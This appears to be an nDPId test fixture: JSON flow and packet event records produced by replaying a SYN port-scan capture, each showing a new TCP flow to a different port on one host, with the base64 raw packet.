-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1888,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsTJkAAC0GztmsEAAIQA2GNIzSB\/HdUoMYAAAAAGACCAAongAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1889,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAsUQEAAC4GyXGsEAAIQA2GNIzSFubdUoMYAAAAAGACDAAVqQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061256,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1890,"flow_packet_id":1,"flow_last_seen":1278275061256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061256,"pkt":"ACYLMQczACWzv5HuCABFAAAstS4AAC4GZUSsEAAIQA2GNIzSH53dUoMYAAAAAGACDAAM8gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1891,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsxqwAADsGRsasEAAIQA2GNIzSALPdUoMYAAAAAGACEAAn3AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsKv8AADkG5HOsEAAIQA2GNIzSB8DdUoMYAAAAAGACCAAozwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsR8wAAC0G06asEAAIQA2GNIzSJpXdUoMYAAAAAGACCAAJ+gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":563,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsGkEAADQG+jGsEAAIQA2GNIzSAjPdUoMYAAAAAGACBAAyXAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAshJIAACsGmOCsEAAIQA2GNIzSAFrdUoMYAAAAAGACEAAoNQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsjeAAACgGkpKsEAAIQA2GNIzSH5TdUoMYAAAAAGACBAAU+wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsnNwAAC0GfpasEAAIQA2GNIzSCqXdUoMYAAAAAGACCAAl6gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAs5ScAACoGOUusEAAIQA2GNIzSATfdUoMYAAAAAGACDAArWAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsVI8AADIGweOsEAAIQA2GNIzSGgrdUoMYAAAAAGACDAAShQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsNeQAAC0G5Y6sEAAIQA2GNIzTDDjdU4MZAAAAAGACCAAkVAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsLcQAACwG7q6sEAAIQA2GNIzTAdHdU4MZAAAAAGACBAAyuwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2kAACUGoAmsEAAIQA2GNIzTpg7dU4MZAAAAAGACCACKfQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhMAACUGEWCsEAAIQA2GNIzTBFTdU4MZAAAAAGACCAAsOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWQAACwGvw6sEAAIQA2GNIzTA+\/dU4MZAAAAAGACBAAwnQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsIoQAACoG++6sEAAIQA2GNIzTGfbdU4MZAAAAAGACDAASlgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAseo0AACUGqOWsEAAIQA2GNIzTCAHdU4MZAAAAAGACCAAoiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsWkgAADkGtSqsEAAIQA2GNIzTAFXdU4MZAAAAAGACCAAwNwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsjOIAACoGkZCsEAAIQA2GNIzTCBHdU4MZAAAAAGACDAAkewAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsawEAAC4Gr3GsEAAIQA2GNIzTAnHdU4MZAAAAAGACDAAqGwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061308,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_packet_id":1,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061308,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/QAADkGW36sEAAIQA2GNIzTCMvdU4MZAAAAAGACCAAnwQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsePMAACYGqX+sEAAIQA2GNIzTFGndU4MZAAAAAGACDAAYIwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
